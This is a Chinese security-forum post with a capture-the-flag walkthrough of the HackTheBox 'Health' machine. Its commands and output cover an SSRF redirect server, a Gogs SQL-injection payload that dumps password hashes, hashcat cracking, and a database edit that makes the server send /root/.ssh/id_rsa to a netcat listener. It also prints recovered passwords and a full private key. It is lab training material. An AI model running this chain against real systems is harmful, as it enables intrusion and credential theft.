首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[原创]HTB health (MEDIUM)
发表于: 2023-1-5 12:26 709

[原创]HTB health (MEDIUM)

hml189 活跃值
2023-1-5 12:26
709

参考链接:https://gatogamer1155.github.io/hackthebox/health/
https://mark0.pw/2022/11/12/HackTheBox-Health-Writeup/
上来还是先扫端口

1
rustscan 10.10.11.176

图片描述
通过nmap看到被过滤的3000端口
图片描述
直接打开网站看一下
可以检查http服务是否可用,检查服务器是否正常运行或是否有防火墙阻止访问。
图片描述
使用ssrf来获取3000端口的信息
ssrf相关帖子
https://security.tencent.com/index.php/blog/msg/179
向我们设置的服务发送请求,将已过滤的端口3000 重定向到它自己的本地主机,使用4444接收响应

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/python3
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler
 
class Redirect(BaseHTTPRequestHandler):
  def do_GET(self):
      self.send_response(302)
      self.send_header('Location', sys.argv[1])
      self.end_headers()
 
HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()
1
2
3
4
5
sudo python redirect.py http://127.0.0.1:3000/
netcat -lvnp 4444
http://10.10.16.16:4444
http://10.10.16.16
*/1****

图片描述
可以获得一个html页面,去掉所有的转义\n\t/ 恢复页面
图片描述

 

参考文章中可的页面:
图片描述
网站由gogs搭建,可以找到源码和相关的cve漏洞

1
2
searchsploit gogs
searchsploit -p 35238.txt

图片描述

1
sudo python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"

图片描述

1
2
3
4
[{\"username\":\"susanne\",
\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},
{\"username\":\"66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37\",
\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}],

salt 替换 passwd

1
sudo python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/salt/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"

图片描述

1
2
3
4
[{\"username\":\"susanne\",
\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},
{\"username\":\"sO3XIbeW14\",
\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}]

知道salt后去破解passwd

1
echo 'sha256:10000:'$(echo 'sO3XIbeW14' | base64 | cut -c1-14)':'$(echo '66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37' | xxd -r -p | base64)
1
sha256:10000:c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=

hashcat和rockyou.txt破解

1
hashcat -m 10900 hash.txt wordlist/SecLists-master/Passwords/Leaked-Databases/rockyou.txt

得到账户密码:susanne february15

1
ssh susanne@10.10.11.176

图片描述

 

运行pspy
图片描述

1
2
/bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1
mysql laravel --execute TRUNCATE tasks

图片描述
在 /var/www/html 的配置文件中,可以找到 mysql 密码

1
2
3
4
5
6
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=laravel
DB_USERNAME=laravel
DB_PASSWORD=MYsql_strongestpass@2014+

/var/www/html/app/Http/Controllers$ cat HealthChecker.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
<?php
 
namespace App\Http\Controllers;
 
class HealthChecker
{
    public static function check($webhookUrl, $monitoredUrl, $onlyError = false)
    {
 
        $json = [];
        $json['webhookUrl'] = $webhookUrl;
        $json['monitoredUrl'] = $monitoredUrl;
 
        $res = @file_get_contents($monitoredUrl, false);
        if ($res) {
 
            if ($onlyError) {
                return $json;
            }
 
            $json['health'] = "up";
            $json['body'] = $res;
            if (isset($http_response_header)) {
            $headers = [];
            $json['message'] = $http_response_header[0];
 
            for ($i = 0; $i <= count($http_response_header) - 1; $i++) {
 
                $split = explode(':', $http_response_header[$i], 2);
 
                if (count($split) == 2) {
                    $headers[trim($split[0])] = trim($split[1]);
                } else {
                    error_log("invalid header pair: $http_response_header[$i]\n");
                }
 
            }
 
            $json['headers'] = $headers;
            }
 
        } else {
            $json['health'] = "down";
        }
 
        $content = json_encode($json);
 
        // send
        $curl = curl_init($webhookUrl);
        curl_setopt($curl, CURLOPT_HEADER, false);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_HTTPHEADER,
            array("Content-type: application/json"));
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $content);
        curl_exec($curl);
        curl_close($curl);
 
        return $json;
 
    }
}

图片描述
发送从 monitoredUrl 读取的内容,这可以从mysql更改并且我们有mysql密码

1
2
mysql -Dlaravel -ularavel -pMYsql_strongestpass@2014+
update tasks set monitoredUrl='file:///root/.ssh/id_rsa';

图片描述
sudo netcat -lvnp 80
开启本地监听就能获得key

1
2
3
4
5
6
7
8
9
10
11
sudo netcat -lvnp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.176
POST / HTTP/1.1
Host: 10.10.14.10
Accept: */*
Content-type: application/json
Content-Length: 1835
Expect: 100-continue
 
{"webhookUrl":"http:\/\/10.10.14.10\/","monitoredUrl":"file:\/\/\/root\/.ssh\/id_rsa","health":"up","body":"-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAwddD+eMlmkBmuU77LB0LfuVNJMam9\/jG5NPqc2TfW4Nlj9gE\nKScDJTrF0vXYnIy4yUwM4\/2M31zkuVI007ukvWVRFhRYjwoEPJQUjY2s6B0ykCzq\nIMFxjreovi1DatoMASTI9Dlm85mdL+rBIjJwfp+Via7ZgoxGaFr0pr8xnNePuHH\/\nKuigjMqEn0k6C3EoiBGmEerr1BNKDBHNvdL\/XP1hN4B7egzjcV8Rphj6XRE3bhgH\n7so4Xp3Nbro7H7IwIkTvhgy61bSUIWrTdqKP3KPKxua+TqUqyWGNksmK7bYvzhh8\nW6KAhfnHTO+ppIVqzmam4qbsfisDjJgs6ZwHiQIDAQABAoIBAEQ8IOOwQCZikUae\nNPC8cLWExnkxrMkRvAIFTzy7v5yZToEqS5yo7QSIAedXP58sMkg6Czeeo55lNua9\nt3bpUP6S0c5x7xK7Ne6VOf7yZnF3BbuW8\/v\/3Jeesznu+RJ+G0ezyUGfi0wpQRoD\nC2WcV9lbF+rVsB+yfX5ytjiUiURqR8G8wRYI\/GpGyaCnyHmb6gLQg6Kj+xnxw6Dl\nhnqFXpOWB771WnW9yH7\/IU9Z41t5tMXtYwj0pscZ5+XzzhgXw1y1x\/LUyan++D+8\nefiWCNS3yeM1ehMgGW9SFE+VMVDPM6CIJXNx1YPoQBRYYT0lwqOD1UkiFwDbOVB2\n1bLlZQECgYEA9iT13rdKQ\/zMO6wuqWWB2GiQ47EqpvG8Ejm0qhcJivJbZCxV2kAj\nnVhtw6NRFZ1Gfu21kPTCUTK34iX\/p\/doSsAzWRJFqqwrf36LS56OaSoeYgSFhjn3\nsqW7LTBXGuy0vvyeiKVJsNVNhNOcTKM5LY5NJ2+mOaryB2Y3aUaSKdECgYEAyZou\nfEG0e7rm3z++bZE5YFaaaOdhSNXbwuZkP4DtQzm78Jq5ErBD+a1af2hpuCt7+d1q\n0ipOCXDSsEYL9Q2i1KqPxYopmJNvWxeaHPiuPvJA5Ea5wZV8WWhuspH3657nx8ZQ\nzkbVWX3JRDh4vdFOBGB\/ImdyamXURQ72Xhr7ODkCgYAOYn6T83Y9nup4mkln0OzT\nrti41cO+WeY50nGCdzIxkpRQuF6UEKeELITNqB+2+agDBvVTcVph0Gr6pmnYcRcB\nN1ZI4E59+O3Z15VgZ\/W+o51+8PC0tXKKWDEmJOsSQb8WYkEJj09NLEoJdyxtNiTD\nSsurgFTgjeLzF8ApQNyN4QKBgGBO854QlXP2WYyVGxekpNBNDv7GakctQwrcnU9o\n++99iTbr8zXmVtLT6cOr0bVVsKgxCnLUGuuPplbnX5b1qLAHux8XXb+xzySpJcpp\nUnRnrnBfCSZdj0X3CcrsyI8bHoblSn0AgbN6z8dzYtrrPmYA4ztAR\/xkIP\/Mog1a\nvmChAoGBAKcW+e5kDO1OekLdfvqYM5sHcA2le5KKsDzzsmboGEA4ULKjwnOXqJEU\n6dDHn+VY+LXGCv24IgDN6S78PlcB5acrg6m7OwDyPvXqGrNjvTDEY94BeC\/cQbPm\nQeA60hw935eFZvx1Fn+mTaFvYZFMRMpmERTWOBZ53GTHjSZQoS3G\n-----END RSA PRIVATE KEY-----\n"}
1
ssh root@10.10.11.176 -i key

图片描述


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2023-1-12 11:11 被hml189编辑 ,原因: 补图
上传的附件:
收藏
免费 3
支持
分享
打赏 + 0.10雪花
赛文奥特曼
打赏次数 1 雪花 + 0.10
 
赞赏  赛文奥特曼   +0.10 2023/01/05
最新回复 (3)
badboyl
雪    币: 4134
活跃值: (5847)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
私信
2
图裂
2023-1-5 13:11
0
hml189
雪    币: 273
活跃值: (6751)
能力值: ( LV7,RANK:105 )
在线值:
发帖
回帖
粉丝
私信
3
badboyl 图裂
图全挂了,我补一下。。。
2023-1-5 14:19
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//